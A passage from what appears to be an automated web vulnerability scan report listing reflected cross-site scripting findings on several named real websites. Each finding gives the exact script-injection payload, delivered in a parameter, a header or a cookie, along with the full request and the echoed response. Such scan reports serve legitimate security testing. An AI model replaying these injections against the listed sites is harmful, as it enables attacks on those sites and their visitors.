Set-Cookie: livezilla=YToyOntzOjY6InVzZXJpZCI7czo3OiIzODFjNTc0IjtzOjY6InZpc2l0cyI7aToxO30%3D; expires=Wed, 27-Jul-2011 14:05:18 GMT
Expires: Sun, 15 May 2011 14:05:18 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 126

lz_tracking_set_sessid("381c574","aed7c27");lz_tracking_callback(30,'1305467989559f6044<script>alert(1)</script>ca9b4d96ff2');

3.178. http://www.wiktel.com/events.php [bgColor parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiktel.com
Path:   /events.php

Issue detail

The value of the bgColor request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2298b'><script>alert(1)</script>7b7bb0d95c7 was submitted in the bgColor parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /events.php?bgColor=EEEDEA2298b'><script>alert(1)</script>7b7bb0d95c7& HTTP/1.1
Host: www.wiktel.com
Proxy-Connection: keep-alive
Referer: http://www.wiktel.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:16:50 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 4556

<html><head>
<style type='text/css'>
a:link, a:visited {color: #0000FF; text-decoration: none;}
a:hover {color: #0000FF; text-decoration: underline;}
a:active {color: #0000FF; text-decoration: none;}

...[SNIP]...
<body bgcolor='EEEDEA2298b'><script>alert(1)</script>7b7bb0d95c7'>
...[SNIP]...

3.179. http://www.wiktel.com/events.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wiktel.com
Path:   /events.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b5a4a'><script>alert(1)</script>036c8c6f9ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /events.php?bgColor=EEE/b5a4a'><script>alert(1)</script>036c8c6f9ecDEA& HTTP/1.1
Host: www.wiktel.com
Proxy-Connection: keep-alive
Referer: http://www.wiktel.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:18:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 4558

<html><head>
<style type='text/css'>
a:link, a:visited {color: #0000FF; text-decoration: none;}
a:hover {color: #0000FF; text-decoration: underline;}
a:active {color: #0000FF; text-decoration: none;}

...[SNIP]...
<body bgcolor='EEE/b5a4a'><script>alert(1)</script>036c8c6f9ecDEA'>
...[SNIP]...

3.180. http://www.yourwebsitevalue.com/getsearchbox.cgi [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.yourwebsitevalue.com
Path:   /getsearchbox.cgi

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1349'-alert(1)-'4ed7fdc4ff1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /getsearchbox.cgi HTTP/1.1
Host: www.yourwebsitevalue.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=b1349'-alert(1)-'4ed7fdc4ff1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:01:41 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.8
Content-Length: 3320
Content-Type: text/html

<html>
<head>    
       <script language="JavaScript" type="text/javascript">
           //Gets the browser specific XmlHttpRequest Object
           function YWVgetXmlHttpRequestObject() {
               if (window.XMLHttpRequest) {

...[SNIP]...
<script type="text/javascript">
YWVcheckValue('http://www.google.com/search?hl=en&q=b1349'-alert(1)-'4ed7fdc4ff1',2);
</script>
...[SNIP]...

3.181. http://image.providesupport.com/js/chatcisp1/safe-monitor.js [vsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/chatcisp1/safe-monitor.js

Issue detail

The value of the vsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 417f3"-alert(1)-"9bc35301f96 was submitted in the vsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/chatcisp1/safe-monitor.js?ps_h=1Otf%26ps_t%3D1305465905985 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.cisp.com/products/cisp/restora_backup/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vsid=sqa5xksTHqX5417f3"-alert(1)-"9bc35301f96

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript
Cache-Control: must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 3473
Date: Sun, 15 May 2011 13:25:30 GMT
Connection: close

var ps_chatcisp1_sid = "sqa5xksTHqX5417f3"-alert(1)-"9bc35301f96";
// safe-monitor@gecko.js

var ps_chatcisp1_iso;
try {
   ps_chatcisp1_iso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.ps_chatcisp1_wid != null);
} catch(e) {
   ps_chatcisp1_iso
...[SNIP]...

3.182. http://image.providesupport.com/js/corecommerce/safe-standard.js [vsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/corecommerce/safe-standard.js

Issue detail

The value of the vsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8c3c"-alert(1)-"57d21297b34 was submitted in the vsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/corecommerce/safe-standard.js?ps_h=XMz2&amp;ps_t=1305467816428 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.corecommerce.com/?gclid=COfz98aO6qgCFQly5Qod3VaGJw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vsid=sqa5xksTHqX5e8c3c"-alert(1)-"57d21297b34

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript
Cache-Control: must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 5155
Date: Sun, 15 May 2011 13:57:05 GMT
Connection: close

var psXMz2sid = "sqa5xksTHqX5e8c3c"-alert(1)-"57d21297b34";
// safe-standard@gecko.js

var psXMz2iso;
try {
   psXMz2iso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psXMz2wid != null);
} catch(e) {
   psXMz2iso = false;
}
if (psXMz2iso)
...[SNIP]...

3.183. http://seg.sharethis.com/getSegment.php [__stid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload c3533<script>alert(1)</script>009f5d08c6b was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fwww.oscommerce.com%2Fabout%2Fnews%2C135&jsref=http%3A%2F%2Fwww.oscommerce.com%2Fsolutions&rnd=1305467849538 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce.com/about/news,135
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspjoE3OVb2YWRTJR8rMAg==c3533<script>alert(1)</script>009f5d08c6b

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Sun, 15 May 2011 13:59:59 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1368


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<div style='display:none'>clicookie:CspjoE3OVb2YWRTJR8rMAg==c3533<script>alert(1)</script>009f5d08c6b
userid:
</div>
...[SNIP]...

3.184. http://store.mandriva.com/ [osCsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.mandriva.com
Path:   /

Issue detail

The value of the osCsid cookie is copied into the HTML document as plain text between tags. The payload 5513d<script>alert(1)</script>ff2ec5c09da was submitted in the osCsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?action=buy_now&products_id=495 HTTP/1.1
Host: store.mandriva.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.mandriva.com/g/style/reset-fonts-grids.css
Cookie: osCsid=baf29fe3beb0b63ae0b0d6dbef6b77e65513d<script>alert(1)</script>ff2ec5c09da; __utma=1.1215541348.1305469631.1305469631.1305469631.1; __utmb=1.1.10.1305469631; __utmc=1; __utmz=1.1305469631.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:31:33 GMT
Server: Apache-AdvancedExtranetServer/2.0.53 (Mandriva Linux/PREFORK-9.4.102mdk) mod_ssl/2.0.53 OpenSSL/0.9.7e PHP/4.3.10
X-Powered-By: PHP/4.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14529

<!DOCTYPE html>
<html dir="ltr" lang="en">
<head>
<link rel="canonical" href="/product_info.php?products_id=495&currency=EUR&language=english" />
<meta http-equiv="Content-Type" content="text/
...[SNIP]...
<br>insert into sessions values ('baf29fe3beb0b63ae0b0d6dbef6b77e65513d<script>alert(1)</script>ff2ec5c09da', '1305471333', 'cart|O:12:\"shoppingcart\":4:{s:8:\"contents\";a:0:{}s:5:\"total\";i:0;s:6:\"weight\";i:0;s:12:\"content_type\";b:0;}language|s:7:\"english\";languages_id|s:1:\"2\";currency|s:3:\"EUR
...[SNIP]...

3.185. http://store.mandriva.com/g/style/base-min.css [osCsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.mandriva.com
Path:   /g/style/base-min.css

Issue detail

The value of the osCsid cookie is copied into the HTML document as plain text between tags. The payload aff8e<script>alert(1)</script>3048c8f55e5 was submitted in the osCsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /g/style/base-min.css HTTP/1.1
Host: store.mandriva.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.mandriva.com/g/style/reset-fonts-grids.css
Cookie: osCsid=baf29fe3beb0b63ae0b0d6dbef6b77e6aff8e<script>alert(1)</script>3048c8f55e5; __utma=1.1215541348.1305469631.1305469631.1305469631.1; __utmb=1.1.10.1305469631; __utmc=1; __utmz=1.1305469631.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:28:39 GMT
Server: Apache-AdvancedExtranetServer/2.0.53 (Mandriva Linux/PREFORK-9.4.102mdk) mod_ssl/2.0.53 OpenSSL/0.9.7e PHP/4.3.10
X-Powered-By: PHP/4.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14820

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
   <m
...[SNIP]...
<br>insert into sessions values ('baf29fe3beb0b63ae0b0d6dbef6b77e6aff8e<script>alert(1)</script>3048c8f55e5', '1305471160', 'cart|O:12:\"shoppingcart\":4:{s:8:\"contents\";a:0:{}s:5:\"total\";i:0;s:6:\"weight\";i:0;s:12:\"content_type\";b:0;}language|s:7:\"english\";languages_id|s:1:\"2\";currency|s:3:\"EUR
...[SNIP]...

3.186. http://store.mandriva.com/g/style/reset-fonts-grids.css [osCsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.mandriva.com
Path:   /g/style/reset-fonts-grids.css

Issue detail

The value of the osCsid cookie is copied into the HTML document as plain text between tags. The payload 6d280<script>alert(1)</script>864c9da4fc6 was submitted in the osCsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /g/style/reset-fonts-grids.css HTTP/1.1
Host: store.mandriva.com
Proxy-Connection: keep-alive
Referer: http://store.mandriva.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: osCsid=ec2a9a6ea60155f00ba7c10d328b14af6d280<script>alert(1)</script>864c9da4fc6

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:01:27 GMT
Server: Apache-AdvancedExtranetServer/2.0.53 (Mandriva Linux/PREFORK-9.4.102mdk) mod_ssl/2.0.53 OpenSSL/0.9.7e PHP/4.3.10
X-Powered-By: PHP/4.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14956

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
   <m
...[SNIP]...
<br>insert into sessions values ('ec2a9a6ea60155f00ba7c10d328b14af6d280<script>alert(1)</script>864c9da4fc6', '1305469527', 'cart|O:12:\"shoppingcart\":4:{s:8:\"contents\";a:0:{}s:5:\"total\";i:0;s:6:\"weight\";i:0;s:12:\"content_type\";b:0;}language|s:7:\"english\";languages_id|s:1:\"2\";currency|s:3:\"EUR
...[SNIP]...

3.187. http://store.mandriva.com/just_added.php [osCsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.mandriva.com
Path:   /just_added.php

Issue detail

The value of the osCsid cookie is copied into the HTML document as plain text between tags. The payload e1a93<script>alert(1)</script>a601e6228df was submitted in the osCsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /just_added.php?products_id=495 HTTP/1.1
Host: store.mandriva.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.mandriva.com/product_info.php?products_id=495
Cookie: osCsid=baf29fe3beb0b63ae0b0d6dbef6b77e6e1a93<script>alert(1)</script>a601e6228df; __utma=1.1215541348.1305469631.1305469631.1305469631.1; __utmb=1.2.10.1305469631; __utmc=1; __utmz=1.1305469631.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:31:13 GMT
Server: Apache-AdvancedExtranetServer/2.0.53 (Mandriva Linux/PREFORK-9.4.102mdk) mod_ssl/2.0.53 OpenSSL/0.9.7e PHP/4.3.10
X-Powered-By: PHP/4.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 7644

<!DOCTYPE html>
<html dir="ltr" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name="verify-v1" content="0fEbSr6Xb4TWnbDkESAq/WBiiZ
...[SNIP]...
<br>insert into sessions values ('baf29fe3beb0b63ae0b0d6dbef6b77e6e1a93<script>alert(1)</script>a601e6228df', '1305471313', 'cart|O:12:\"shoppingcart\":4:{s:8:\"contents\";a:0:{}s:5:\"total\";i:0;s:6:\"weight\";i:0;s:12:\"content_type\";b:0;}language|s:7:\"english\";languages_id|s:1:\"2\";currency|s:3:\"EUR
...[SNIP]...

3.188. http://store.mandriva.com/product_info.php [osCsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.mandriva.com
Path:   /product_info.php

Issue detail

The value of the osCsid cookie is copied into the HTML document as plain text between tags. The payload e2cc3<script>alert(1)</script>a9b554f8c69 was submitted in the osCsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /product_info.php?products_id=495 HTTP/1.1
Host: store.mandriva.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.mandriva.com/g/style/reset-fonts-grids.css
Cookie: osCsid=baf29fe3beb0b63ae0b0d6dbef6b77e6e2cc3<script>alert(1)</script>a9b554f8c69; __utma=1.1215541348.1305469631.1305469631.1305469631.1; __utmb=1.1.10.1305469631; __utmc=1; __utmz=1.1305469631.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:30:13 GMT
Server: Apache-AdvancedExtranetServer/2.0.53 (Mandriva Linux/PREFORK-9.4.102mdk) mod_ssl/2.0.53 OpenSSL/0.9.7e PHP/4.3.10
X-Powered-By: PHP/4.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14529

<!DOCTYPE html>
<html dir="ltr" lang="en">
<head>
<link rel="canonical" href="/product_info.php?products_id=495&currency=EUR&language=english" />
<meta http-equiv="Content-Type" content="text/
...[SNIP]...
<br>insert into sessions values ('baf29fe3beb0b63ae0b0d6dbef6b77e6e2cc3<script>alert(1)</script>a9b554f8c69', '1305471253', 'cart|O:12:\"shoppingcart\":4:{s:8:\"contents\";a:0:{}s:5:\"total\";i:0;s:6:\"weight\";i:0;s:12:\"content_type\";b:0;}language|s:7:\"english\";languages_id|s:1:\"2\";currency|s:3:\"EUR
...[SNIP]...

3.189. http://store.mandriva.com/product_info.php [osCsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.mandriva.com
Path:   /product_info.php

Issue detail

The value of the osCsid cookie is copied into the HTML document as plain text between tags. The payload b2b5b<script>alert(1)</script>949c83499ab9a5e0e was submitted in the osCsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /product_info.php?products_id=495&action=add_product&id%5B24%5D=88&products_id=495 HTTP/1.1
Host: store.mandriva.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.mandriva.com/product_info.php?products_id=495
Cookie: osCsid=baf29fe3beb0b63ae0b0d6dbef6b77e6b2b5b<script>alert(1)</script>949c83499ab9a5e0e; __utma=1.1215541348.1305469631.1305469631.1305469631.1; __utmb=1.2.10.1305469631; __utmc=1; __utmz=1.1305469631.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:35:53 GMT
Server: Apache-AdvancedExtranetServer/2.0.53 (Mandriva Linux/PREFORK-9.4.102mdk) mod_ssl/2.0.53 OpenSSL/0.9.7e PHP/4.3.10
X-Powered-By: PHP/4.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 7724

<!DOCTYPE html>
<html dir="ltr" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name="verify-v1" content="0fEbSr6Xb4TWnbDkESAq/WBiiZ
...[SNIP]...
<br>insert into sessions values ('baf29fe3beb0b63ae0b0d6dbef6b77e6b2b5b<script>alert(1)</script>949c83499ab9a5e0e', '1305471593', 'cart|O:12:\"shoppingcart\":4:{s:8:\"contents\";a:0:{}s:5:\"total\";i:0;s:6:\"weight\";i:0;s:12:\"content_type\";b:0;}language|s:7:\"english\";languages_id|s:1:\"2\";currency|s:3:\"EUR
...[SNIP]...

3.190. http://www.vehix.com/ [physicalzip cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vehix.com
Path:   /

Issue detail

The value of the physicalzip cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 386bc</script><script>alert(1)</script>cd811f435f3 was submitted in the physicalzip cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?VXSS=1 HTTP/1.1
Host: www.vehix.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
